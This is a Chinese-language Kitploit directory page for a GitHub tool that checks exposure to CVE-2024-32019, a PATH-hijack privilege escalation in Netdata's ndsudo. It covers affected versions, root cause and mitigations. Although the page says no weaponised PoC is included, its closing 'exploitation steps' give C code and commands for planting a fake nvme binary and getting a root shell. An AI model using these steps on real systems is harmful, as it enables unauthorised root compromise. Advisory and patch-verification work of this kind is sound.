Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2024-32019-PoC — 检查 Netdata ndsudo SUID PATH 权限提升暴露情况,针对 CVE-2024-32019,并在不使用武器化利用的情况下验证补丁。 | Kitploit
工具/GitHubGitHub/ayub0x7/cve-2024-32019-poc
防御工具权限提升漏洞分析漏洞利用安全虚拟化渗透测试
GitHubayub0x7/cve-2024-32019-poc

cve-2024-32019-PoC

检查 Netdata ndsudo SUID PATH 权限提升暴露情况,针对 CVE-2024-32019,并在不使用武器化利用的情况下验证补丁。

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-32019 — Netdata ndsudo 本地权限提升

摘要

Netdata 的 ndsudo 辅助程序(以 setuid root 安装)限制了它可以运行的命令,但使用调用者的 PATH 来解析这些命令。在受影响的版本中,本地用户可以将恶意二进制文件放在 PATH 中更靠前的位置,使 ndsudo 以 root 权限执行它。已在 Netdata 1.45.3 和 1.45.0-169 中修复。

受影响 / 已修复

  • 受影响: >= 1.44.0-60, < 1.45.0-169 和 >= 1.45.0, < 1.45.3(根据上游安全公告)。

  • 已修复: 1.45.3(稳定版)、1.45.0-169(每日构建版)。GitHub

影响

在 ndsudo 以 SUID 安装且用户可以调用它的系统上(通常是 netdata 组的成员),可实现本地权限提升至 root。NVDGitHub

根本原因(概要)

  • ndsudo 是 SUID-root,并白名单了诸如 nvme-list、nvme-smart-log 等子命令。

  • 它按名称调用外部可执行文件(例如 nvme),这些文件通过 PATH 解析,而不是使用绝对路径或安全的固定搜索路径。

  • 如果可写目录出现在系统路径之前,攻击者可以引入一个外观相似的二进制文件,从而以 root 身份执行。GitHub

安全复现 / 验证

本仓库包含非利用性检查工具,它们会:

  • 检查 /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo(或实际安装位置)的 SUID/所有权。

  • 枚举 PATH 中位于常见系统路径之前的可写目录。

  • 确认 ndsudo 可能尝试执行的白名单子命令名称是否存在。

  • 可选地运行 ndsudo --test <subcommand> 来打印解析后的命令而不执行它(请谨慎使用,先阅读代码)。GitHub

⚠️ 不包含武器化的 PoC。本项目供防御者和研究人员负责任地评估暴露风险并验证补丁。

缓解措施

  • 升级 Netdata 至 1.45.3(稳定版)或 1.45.0-169(每日构建版)。

  • 作为纵深防御措施,在 SUID 辅助程序中优先使用绝对路径或经过清理的最小 PATH;避免授予不必要的 ndsudo 访问权限。GitHubwiz.io

利用步骤

1. 将以下 C 代码保存为 nvme.c:
root@kitploit:~
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}
2. 编译利用程序
root@kitploit:~
gcc nvme.c - nvme
3. 环境设置
root@kitploit:~
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme
4. 修改 PATH
root@kitploit:~
export PATH=/tmp/fakebin:$PATH
5. 利用命令
root@kitploit:~
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

参考资料

  • NVD: CVE-2024-32019。NVD

  • Netdata 安全公告(GHSA-pmhq-4cxq-wj93)。GitHub

  • Wiz 摘要。wiz.io

  • Snyk 文章。Vulnerability Guide

  • MITRE/CVE 列表。CVE

下载工具